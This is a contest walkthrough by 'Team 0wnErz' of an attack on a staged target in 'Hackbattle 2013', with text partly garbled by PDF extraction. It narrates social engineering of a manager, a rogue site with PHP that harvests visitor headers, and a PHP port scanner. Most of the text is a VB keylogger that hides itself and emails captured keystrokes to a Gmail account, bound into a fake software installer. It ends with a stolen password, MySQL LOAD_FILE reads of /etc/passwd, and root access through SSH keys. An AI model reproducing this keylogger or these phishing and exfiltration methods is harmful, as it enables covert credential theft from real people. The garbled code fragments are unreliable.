Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu
HackBattle 2013
WalkThrough
M a r c h 2 8 , 2 0 1 4

The Scenario
The Process
The Server looks well protected from the above scenario but it also shows evidence
of workstations which are not behind the same firewall. This in the team 0wnErz
case was the best target but how to get to them was the tricky bit. So the starting
point was what we see i.e.
http://197.232.19.194
Looking at the site static html nothing fancy on it no php code therefore ruling out
all possibility of SQL injections which is everyone’s juicy cake. Going for the forms,
drat those mail too so no PHP
form to post to .
The worst you get was directory listing and a failed adobe gallery scripts missing
from the gallery page, damn those would have helped us read the logs as they
need that access to work. So what
Found 2 emails:
now. Look at what the site has to offer.
M a r c h 2 8 , 2 0 1 4

· Joan.wokabi@gmail.com
· Daniella.wambuas@gmail.com
–Manager (Home Page)
– IT Staff Manager (About Us Page)
So basically for now we have 2 managers a
here the push was for the business manager let’s see if she can help us.
business one and a techie one, so from
So our First contact was to complain about the lack of user experience on the
appointment page , nothing fancy just to see how she takes it and
gauge our
audience. This is how it went.
She replied and it’s apparent that she
does care about user experience one thing
noted though she copied daniella in the response who we found out is Daniel and
the email was misspelled on the site.
So next a little bit of more getting to know
about the where abouts but noticing there is a
“database” where we have been
recorded but where?? , nice!!!!!!
nice!!!!!!.
A little bit more talk and she asks for more information about us and we gladly give
our alias justifying stifying our email too as to why it is not so personalized ;). On doing this
and the rapport building up Joan mentions something important … she input us in
the database and she has access to it, also from her email we can see that there’s
an application to o manage a database.
M a r c h 2 8 , 2 0 1 4

Munir Njiru || Ruth Efrain MMuunniirr NNjjiirruu |||| RRuutthh EEffrraaiinn |||||| IIIbbbrrraaahhhiiimmm GGGaaattthhhuuunnnggguuu
M a r c h 2 8 , 2 0 1 4

I don’t know about you but most people I know have :
· phpMyAdmin
· sqlbuddy
Let’s go with number one though , most common install directories for the system.
Well long story short after a slow trial and e
know right. ☺ Progress Finally but now we need to tread carefully.
Now there are 2 things we can do:
error we found a /data directory. Cool I
· try exploit the phpMyAdmin
· try trap Joan and compromise Joan’s machine since she has access
We decided to try both but weigh our chances.
phpMyAdmin
So step one was view the
M a r c h 2 8 , 2 0 1 4
rror

Also notice test.php well that’s phpinfo awesome wealth of information about the
server:
M a r c h 2 8 , 2 0 1 4

Server root: /etc/apache2
webroot: /var/www/
User/Group www-data(33)/33
php version: 5.5.3-1ubuntu2.2
allow_url_fopen On
mysql: 5.5.35
internal IP: 192.168.200.2
Back to phpMyAdmin Well we are dealing with one revision from the latest version:
its 4.1.8.
What are the odds we will kill this thing and go free
free, well seeing the prompt tells
you that no user goes in without a pass so we download the same version of
phpmyAdmin and install it on our end now only one problem we create a valid login
to a default db i.e. mysql however we can’t replay the 4 cookies, as
we realized
later is because the online one lacked mcrypt while we had it therefore our cookie
pattern was quite different.
M a r c h 2 8 , 2 0 1 4

M a r c h 2 8 , 2 0 1 4
“God Blesses those who put errors on their homepage and this server wasn’t
blessed it was cursed!!! ”
So lets go the Joan way first if she has access to this we shall know but we need to
be smart about this so here is the breakdown of the needs.
· Find Joan’s environment she must be one of the workstations , what’s she
running , what’s her address etc.
· Come up with a super trap and hook joan to it then get enough info to steal
her credentials and login as her.
So for the first team 0wnErz went with make the competition so acquire a rogue
domain first we we got (http://spa.oo3.co). We took a few days to just make a nice
HTML site for a spa but added a bit of php code in two sections: the first took her
information as she visited in the home page and wrote to a text file and incase she
missed that we had another similar hook that mailed us the information when she
submitted a form.
The information we needed most was :
· IP
· Full User Agent Information Including OS information to aid in performing our
attack.

The Site:
The script on the homepage had this php added to it
got a summary of just what we needed and the second everything incase there
were extras:
<?php
$filename="0xt0uaipg.africahackon";
$filename2="0xt0uaipg2.africahackon";
$data="Server IP: ".$_SERVER['REMOTE_ADDR']."
".$_SERVER['HTTP_USER_AGENT']."
###############################################################
#############################
file_put_contents($filename, $data, FILE_APPEND, $context = null);
foreach ($_SERVER as $key => $value) {
$fullheaders .= $key . ": " . $value . "
file_put_contents($filename2, $fullheaders, FILE_APPEND, $context = null);
}
?>
it, it wrote to two files the first
ry ADDR']."n User Agent:
AGENT']."n X-Forwarder:".$_SERVER['HTTP_X_FORWARDED_FOR']."
nn";
"n n";
M a r c h 2 8 , 2 0 1 4
, orwarder:".$_FOR']."n

So we talked to Joan to check it out
and she did:
;)
M a r c h 2 8 , 2 0 1 4

So she is on an XP and her IP is that
here if we go for a browser attack but let’s check if the IP is for a router or Proxy or
the actual machine. So we made a simple port scanner none noisy
<?php
echo "#################################### 
PortScanner n #################################### 
$host = "197.232.19.195";
$ports=array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","330
6","3389","5900","8080");
$arrlength=count($ports);
for($i=0;$i<$arrlength;$i++) {
$fp = fsockopen($host,$ports[$i],$errno,$errstr,10);
if($fp)
as is on screen, Firefox 27 damn a lot of work
☺
br/>nTeam 0wnErz H
M a r c h 2 8 , 2 0 1 4
, HB2013
/>n";

{
echo "port " . $ports[$i] . " open on " . $host ." 
echo " ";
fclose($fp);
}
else
{
echo "port " . $ports[$i] . " closed on " . $host . " 
echo " ";
}
flush();
}
?>
Anyway as you can see nothing fancy fsock is like telnet in PHP :D only we can do it
from our webserver online or locally if it gets blacklisted easy to move to another
server and continue but we didn’t
Rdesktop interesting is on this thing and
/>n";
/>n";
didn’t,…. no noise :D
http but rdesktop is important lets test it.
M a r c h 2 8 , 2 0 1 4

Windows Server 2003 WTF :D . Ok someone’s playing us so now part 2 of our
attack needs to be smart we don’t have
a very direct target.
Since we are dealing with an XP ,
that but either way we will need a windows payload , windows xp and server 2003
lack elevated desktop so binding some nice app
good results. If you like commercially done keyloggers you can get things like
redfox and ardamax etc limitless but nway save yourself the hustle and write some
code signature based AV’s won’t have them most probably and keep it on simple
logic not complex hooks those get flagged
ince user agent didn’t lie or rather we chose to believe
Don’t get jealous ours does :
application to a keylogger
flagged.
· Screenshots and keys every ten minutes to our harvester email.
and apps keys have been trapped from
way don’t download and run :D
we put our things together the simple
D.
Gmail one. Easiest to send to.
in VB.
its because we want to reduce dependencies and
Note:
You need a harvester email preferably a
Here is a snippet from the logic of our keylogger
‘basic emailer include and simple system output
Imports System.IO
Imports System.Net.Mail
‘ yes if you are asking why the driver declares below it
work with what windows already has.
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
M a r c h 2 8 , 2 0 1 4
lication should yield
And keys
s

M a r c h 2 8 , 2 0 1 4
Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessId As Integer,
ByVal dwType As Integer) As Integer
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As
Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
‘basic house cleaning for caps and shift key presses so that we accurately record letters as caps or not
caps in our main keylogger
Public Function CAPSLOCKON() As Boolean
If My.Computer.Keyboard.CapsLock = True Then
Return True
Else
Return False
End If
End Function
Dim mimiNiCapsAmaLa As Integer
Dim Shifter As Integer
‘Keylogger Engine- usually behind your timer ;) ours is a 10 minute space on the highest of our 3
timers and a textbox to pass your data through.
Shifter = GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey)
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.A)
If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or
(CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then
txtNishikieKeys.Text = txtNishikieKeys.Text & "A"
End If
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then
txtNishikieKeys.Text = txtNishikieKeys.Text & "a"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.B)
txtNishikieKeys.Text = txtNishikieKeys.Text & "B"

M a r c h 2 8 , 2 0 1 4
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "b"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.C)
txtNishikieKeys.Text = txtNishikieKeys.Text & "C"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "c"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D)
txtNishikieKeys.Text = txtNishikieKeys.Text & "D"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "d"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.E)
txtNishikieKeys.Text = txtNishikieKeys.Text & "E"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "e"

M a r c h 2 8 , 2 0 1 4
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F)
txtNishikieKeys.Text = txtNishikieKeys.Text & "F"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "f"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.G)
txtNishikieKeys.Text = txtNishikieKeys.Text & "G"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "g"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.H)
txtNishikieKeys.Text = txtNishikieKeys.Text & "H"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "h"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.I)

M a r c h 2 8 , 2 0 1 4
txtNishikieKeys.Text = txtNishikieKeys.Text & "I"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "i"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.J)
txtNishikieKeys.Text = txtNishikieKeys.Text & "J"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "j"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.K)
txtNishikieKeys.Text = txtNishikieKeys.Text & "K"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "k"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.L)
txtNishikieKeys.Text = txtNishikieKeys.Text & "L"
End If

M a r c h 2 8 , 2 0 1 4
txtNishikieKeys.Text = txtNishikieKeys.Text & "l"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.M)
txtNishikieKeys.Text = txtNishikieKeys.Text & "M"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "m"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.N)
txtNishikieKeys.Text = txtNishikieKeys.Text & "N"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "n"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.O)
txtNishikieKeys.Text = txtNishikieKeys.Text & "O"
End If

M a r c h 2 8 , 2 0 1 4
txtNishikieKeys.Text = txtNishikieKeys.Text & "o"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.P)
txtNishikieKeys.Text = txtNishikieKeys.Text & "P"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "p"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Q)
txtNishikieKeys.Text = txtNishikieKeys.Text & "Q"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "q"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.R)
txtNishikieKeys.Text = txtNishikieKeys.Text & "R"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "r"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.S)

M a r c h 2 8 , 2 0 1 4
txtNishikieKeys.Text = txtNishikieKeys.Text & "S"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "s"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.T)
txtNishikieKeys.Text = txtNishikieKeys.Text & "T"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "t"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.U)
txtNishikieKeys.Text = txtNishikieKeys.Text & "U"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "u"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.V)
txtNishikieKeys.Text = txtNishikieKeys.Text & "V"
End If

M a r c h 2 8 , 2 0 1 4
txtNishikieKeys.Text = txtNishikieKeys.Text & "v"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.W)
txtNishikieKeys.Text = txtNishikieKeys.Text & "W"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "w"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.X)
txtNishikieKeys.Text = txtNishikieKeys.Text & "X"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "x"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Y)
txtNishikieKeys.Text = txtNishikieKeys.Text & "Y"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "y"
End If

M a r c h 2 8 , 2 0 1 4
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Z)
txtNishikieKeys.Text = txtNishikieKeys.Text & "Z"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "z"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D1)
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then
txtNishikieKeys.Text = txtNishikieKeys.Text & "1"
End If
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then
txtNishikieKeys.Text = txtNishikieKeys.Text & "!"
End If
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "@"
End If

M a r c h 2 8 , 2 0 1 4
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "#"
End If
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "$"
End If
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "%"
End If

M a r c h 2 8 , 2 0 1 4
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "^"
End If
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "&"
End If
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
End If

M a r c h 2 8 , 2 0 1 4
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "("
End If
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & ")"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Back)
If (mimiNiCapsAmaLa And &H1S) = &H1S Then
txtNishikieKeys.Text = txtNishikieKeys.Text & "[backspace]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Tab)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[tab]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Return)
txtNishikieKeys.Text = txtNishikieKeys.Text & vbCrLf
End If

M a r c h 2 8 , 2 0 1 4
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ShiftKey)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[shift]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[ctrl]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Menu)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[alt]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Pause)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[pause]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Escape)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[esc]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Space)
txtNishikieKeys.Text = txtNishikieKeys.Text & " "
End If

M a r c h 2 8 , 2 0 1 4
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.End)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[end]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Home)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[home]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Left)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[left]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Right)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[right]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Up)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[up]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Down)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[down]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Insert)

M a r c h 2 8 , 2 0 1 4
txtNishikieKeys.Text = txtNishikieKeys.Text & "[insert]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Delete)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[Delete]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBAS)
txtNishikieKeys.Text = txtNishikieKeys.Text & ";"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & ":"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBBS)
txtNishikieKeys.Text = txtNishikieKeys.Text & "="
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBCS)
txtNishikieKeys.Text = txtNishikieKeys.Text & ","
End If

M a r c h 2 8 , 2 0 1 4
txtNishikieKeys.Text = txtNishikieKeys.Text & "<"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBDS)
txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "_"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBES)
txtNishikieKeys.Text = txtNishikieKeys.Text & "."
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & ">"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBFS)
txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "?"
End If

M a r c h 2 8 , 2 0 1 4
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HC0S)
txtNishikieKeys.Text = txtNishikieKeys.Text & "`"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "~"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDBS)
txtNishikieKeys.Text = txtNishikieKeys.Text & "["
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "["
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDCS)
txtNishikieKeys.Text = txtNishikieKeys.Text & ""
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "|"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDDS)
txtNishikieKeys.Text = txtNishikieKeys.Text & "]"

M a r c h 2 8 , 2 0 1 4
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDES)
txtNishikieKeys.Text = txtNishikieKeys.Text & "'"
End If
txtNishikieKeys.Text = txtNishikieKeys.Text & Chr(34)
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Multiply)
txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Divide)
txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Add)
txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Subtract)

M a r c h 2 8 , 2 0 1 4
txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Decimal)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[Del]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F1)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F1]"
End If
End If
End If
End If

M a r c h 2 8 , 2 0 1 4
End If
End If
End If
End If
End If
End If

M a r c h 2 8 , 2 0 1 4
End If
End If
Me.Visible = True
Call RegisterServiceProcess(0, 0)
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumLock)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[NumLock]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Scroll)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[ScrollLock]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Print)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[PrintScreen]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageUp)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[PageUp]"
End If

M a r c h 2 8 , 2 0 1 4
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageDown)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[Pagedown]"
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad1)
End If
End If
End If
End If
End If

M a r c h 2 8 , 2 0 1 4
End If
End If
End If
End If
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
txtNishikieKeys.Text = txtNishikieKeys.Text & "[Ctrl]"
End If
‘this ends checking our keys for now
‘next trap active window so that we can record and associate do It in one of your timers preferably
with a short time frame.

M a r c h 2 8 , 2 0 1 4
Private Function GetActiveWindowTitle() As String
Dim kiAppCurrent As String
kiAppCurrent = New String(Chr(0), 100)
GetWindowText(GetForegroundWindow, kiAppCurrent, 100)
kiAppCurrent = kiAppCurrent.Substring(0, InStr(kiAppCurrent, Chr(0)) - 1)
Return kiAppCurrent
End Function
‘in timer 2 we add what we trap to the window we trapped it from
Dim strin As String = Nothing
If strin <> GetActiveWindowTitle() Then
txtNishikieKeys.Text = txtNishikieKeys.Text + vbNewLine & GetActiveWindowTitle() &
vbNewLine
strin = GetActiveWindowTitle()
End If
‘
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress("theharvesteruon@gmail.com")
MyMailMessage.To.Add("theharvesteruon@gmail.com")
MyMailMessage.Subject = "Team 0wnErz "
MyMailMessage.Body = txtNishikieKeys.Text
Dim SMPT As New SmtpClient("smtp.gmail.com")
SMPT.Port = 587
SMPT.EnableSsl = True
SMPT.Credentials = New System.Net.NetworkCredential("theharvesteruon@gmail.com",
"<YouReallyExpectOurHarvesterPasswordToBeGivenHereSorry>")
SMPT.Send(MyMailMessage)
txtNishikieKeys.Text = ""
‘before we forget hide the app lol
Me.hide
Me.opacity = 0
Me.ShowInTaskbar = false

M a r c h 2 8 , 2 0 1 4
For those asking why no keyboard hooks and all the initialization well its XP no need for paranoia and
noise on a system but here’s something to calm you down if you don’t like the tiresome but innocent
method above.
Private KeyboardHookProcedure As Win32.HookProc
Public Sub InstallHooks()
If hKeyboardHook = 0 Then ' install Keyboard hook
KeyboardHookProcedure = New Win32.HookProc(AddressOf KeyboardHookProc)
hKeyboardHook = Win32.SetWindowsHookEx( _
Win32.WH.WH_KEYBOARD_LL, _
KeyboardHookProcedure, _
Marshal.GetHINSTANCE(Reflection.Assembly.GetExecutingAssembly().GetModules( )(0)), _
0)
If (hKeyboardHook = 0) Then 'SetWindowsHookEx failed
RemoveHooks()
Throw New Exception("SetWindowsHookEx failed.")
End If
End If
End Sub
Public Sub RemoveHooks()
Dim keyboardResult As Boolean = True
If hKeyboardHook <> 0 Then
keyboardResult = Win32.UnhookWindowsHookEx(hKeyboardHook)
hKeyboardHook = 0
End If
If Not keyboardResult Then 'UnhookWindowsHookEx failed
Throw New Exception("UnhookWindowsHookEx failed.")
End If
End Sub

M a r c h 2 8 , 2 0 1 4
Also on the Hackbattle group they mentioned that VPS was by Azanuru , and we
checked them out as we did the keylogger. We need as much as we can get as we
plan to own Joan.
So we visit Azanuru site and guess what open test day till 20th. It was running on
Openstack had 3 public IP subnets up and running one on the same network as the
VPS running Nasty salon interesting from phpinfo we saw an ubuntu install so we
did a 13.10 as is the case on the blog’s tutorial and we join the subnet with the VPS
and get a floating IP of:
197.232.19.197
Azanuru guys notice and send us a mail to join the .20 subnet one and kick our
floating IP out but one thing we know is we are using a keypair to login and it has
sudo access amazing ☺. So this (keypair) is what we will be targeting from Joan not
other credentials.
So kick us out but we know btw just a feel of how the droplet started failing:
2014-03-10 15:16:42,647 - url_helper.py[WARNING]: Calling
2014-03-10 15:17:39,795 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-
04/meta-data/instance-id' failed [112/120s]: request error
[HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-
04/meta-data/instance-id (Caused by <class 'socket.error'>: [Errno 101] Network is unreachable)]
2014-03-10 15:17:46,809 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-
04/meta-data/instance-id' failed [119/120s]: request error
[HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-
04/meta-data/instance-id (Caused by <class 'socket.error'>: [Errno 101] Network is unreachable)]
2014-03-10 15:17:53,822 - DataSourceEc2.py[CRITICAL]: Giving up on md from
['http://169.254.169.254/2009-04-04/meta-data/instance-id'] after 126 seconds
2014-03-10 15:17:53,826 - util.py[WARNING]: Getting data from <class
'cloudinit.sources.DataSourceCloudStack.DataSourceCloudStack'> failed
Cloud-init v. 0.7.3 running 'modules:config' at Mon, 10 Mar 2014 15:17:54 +0000. Up 262.78
seconds.
* Starting AppArmor profiles [80G Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd

So we finish our keylogger in 2 versions
simfatic forms , 2 versions btw and we upload them to our spa site and send the
mail to Joan:
immediately she installed it logs started coming in to our harvester and we got
good things:
http://spa.oo3.co/soft/Simfatic
Simfatic-setup-4.exe
http://spa.oo3.co/soft/simfatic
and use easy binder to bind them to
/simfatic-setup-2.exe
The Version of the software we bound was meant to give an error message to give
leeway incase of a problem to talk to her and send a second keylogger usin
different method of logging in order to make it successful incase the first fails.
M a r c h 2 8 , 2 0 1 4
using a

But the keylogger never failed us so here we are: Confirmed XP was right.
So we got this password as she typed her
Tuesday, March 18, 2014 [12:23
Gmail password :
PM] thunderbird.exe: Mail Server Password Required
M a r c h 2 8 , 2 0 1 4

n@stys4l0nw3b
Time to login to the Gmail and see how much we can get I think the
speak for us here:
So phpMyAdmin Points to a db on .195.
SSH keypair to login to the server
pictures
M a r c h 2 8 , 2 0 1 4
will

Database Credentials
|||| IIbbrraahhiimm GGaatthhuunngguu
M a r c h 2 8 , 2 0 1 4

M a r c h 2 8 , 2 0 1 4
Successful Login
In here we found passwords to both emails in the emails database but we were
checking stuff out still before just using our keypair. So we created a database
0wnErz:
We made a table redteam with 2 columns id and data. We filled them with dummy
data then on update we pulled files.
UPDATE redteam SET Data=LOAD_FILE('/etc/hosts)
WHERE id=3;
UPDATE redteam SET Data=LOAD_FILE('/etc/passwd)
WHERE id=4;

For lulz while at it we cracked the mysql root hash
weak password policy on their end
, Despite the firewall this was a
end:
root@localhost: 7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin())
. This happened very fast ☺
r00t
The race to the finish line began here
So our downloaded keypair from the mail we logged in to the db server.
M a r c h 2 8 , 2 0 1 4

Then we became super user:
Then we read the history file and more secrets :
cat .bash_history
M a r c h 2 8 , 2 0 1 4

So there’s another keypair but to the .2 server i.e. webserver
phpinfo? SSH is on port 49800
key and yes it’s just that into the webserver
webserver, remember from
49800, on checking files in the ubuntu home directory the
webserver.
M a r c h 2 8 , 2 0 1 4
ember

Again get Root
